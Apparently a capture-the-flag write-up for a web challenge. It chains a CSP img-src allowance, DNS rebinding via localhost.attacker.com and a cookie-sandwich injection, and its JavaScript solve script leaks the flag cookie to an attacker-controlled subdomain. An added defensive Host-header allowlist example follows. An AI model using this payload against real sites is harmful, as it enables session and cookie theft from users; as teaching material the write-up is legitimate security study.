<aside> 💡
resp.headers["Content-Security-Policy"] = "default-src 'none'; img-src http: https:; style-src 'self';"
we can use img-src
</aside>
We can bypass the visit_url() check in the bot ⇒ we can make the bot visit our webpage.
Flag in cookie ⇒ we can use DNS rebinding and a cookie sandwich via *.attacker.com.
<script>
// Comments added for readability; the steps themselves are the page's own.
const sleep = t => new Promise(r => setTimeout(r, t));
(async () => {
  // Session token scoped to the parent domain, so it is sent to every *.attacker.com host.
  const token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIyIiwiaWF0IjoxNzY4MDE3MTEwLCJleHAiOjE3NjgwMjQzMTB9.VBd77rx24B8UxtfiMNVuZKfo2lB8_T5zo5zxReUYXdU";
  document.cookie = `session=${token};Domain=attacker.com;Path=/flag`;
  // localhost.attacker.com is rebound to localhost, so this request reaches the challenge app.
  let w1 = open("http://localhost.attacker.com:5000/flag");
  // Cookie sandwich: motd opens a quoted value that the z cookie closes later.
  document.cookie = `motd="%3Cimg%20src='//foobar.n.attacker.com/?v=;Domain=attacker.com;Path=/motd`;
  await sleep(1000);
  document.cookie = `z='%3E";Domain=attacker.com;Path=/`;
  let w2 = open("http://localhost.attacker.com:5000/motd");
})();
</script>
localhost.attacker.com ⇒ localhost
foobar.attacker.com ⇒ our server
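Added example from the defending side (not part of the writeup or the challenge code): a Host-header allowlist check of the kind that stops the rebinding step, because after localhost.attacker.com is rebound to 127.0.0.1 the browser still sends `Host: localhost.attacker.com:5000`. The allowed names and port 5000 are assumptions based on the writeup's target.

```javascript
// Added example: reject requests whose Host header is not one of the service's
// own names. Assumption: the app only ever expects these names on port 5000.
const ALLOWED_HOSTS = new Set(["localhost", "127.0.0.1", "[::1]"]);
const EXPECTED_PORT = "5000";

// Split a Host header into {name, port}; returns null when it is malformed.
function parseHostHeader(host) {
  if (typeof host !== "string" || host.length === 0) return null;
  // IPv6 literal form: [addr] or [addr]:port
  const v6 = host.match(/^(\[[0-9a-fA-F:.]+\])(?::(\d{1,5}))?$/);
  if (v6) return { name: v6[1].toLowerCase(), port: v6[2] ?? null };
  // Hostname or IPv4 form: name or name:port (trailing dot normalised away)
  const v4 = host.match(/^([A-Za-z0-9.-]+)(?::(\d{1,5}))?$/);
  if (!v4) return null;
  return { name: v4[1].toLowerCase().replace(/\.$/, ""), port: v4[2] ?? null };
}

// True only when the Host header names this service itself. A rebound
// attacker-controlled name like localhost.attacker.com is refused even though
// it resolves to the same address.
function isTrustedHost(hostHeader) {
  const parsed = parseHostHeader(hostHeader);
  if (!parsed) return false;
  if (!ALLOWED_HOSTS.has(parsed.name)) return false;
  return parsed.port === null || parsed.port === EXPECTED_PORT;
}

// Constructed sample headers, as a browser would send them after rebinding.
const SAMPLE_HOSTS = ["localhost:5000", "localhost.attacker.com:5000", "[::1]:5000"];
for (const h of SAMPLE_HOSTS) console.log(h, "->", isTrustedHost(h) ? "serve" : "reject");
```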
Same as u1, but the flag is in the HTML content, which contains “ ‘ before the flag, so it can't be set as a cookie. However, we can change the encoding to ISO-2022-JP using a meta tag.
We also need to close the quote in ISO-2022-JP, so we use that in the username.
Author's solve script.
<aside> 💡
DNS rebinding setup:
https://www.intruder.io/research/we-hacked-ourselves-with-dns-rebinding
https://www.intruder.io/research/split-second-dns-rebinding-in-chrome-and-safari
</aside>
Script setup @crazyman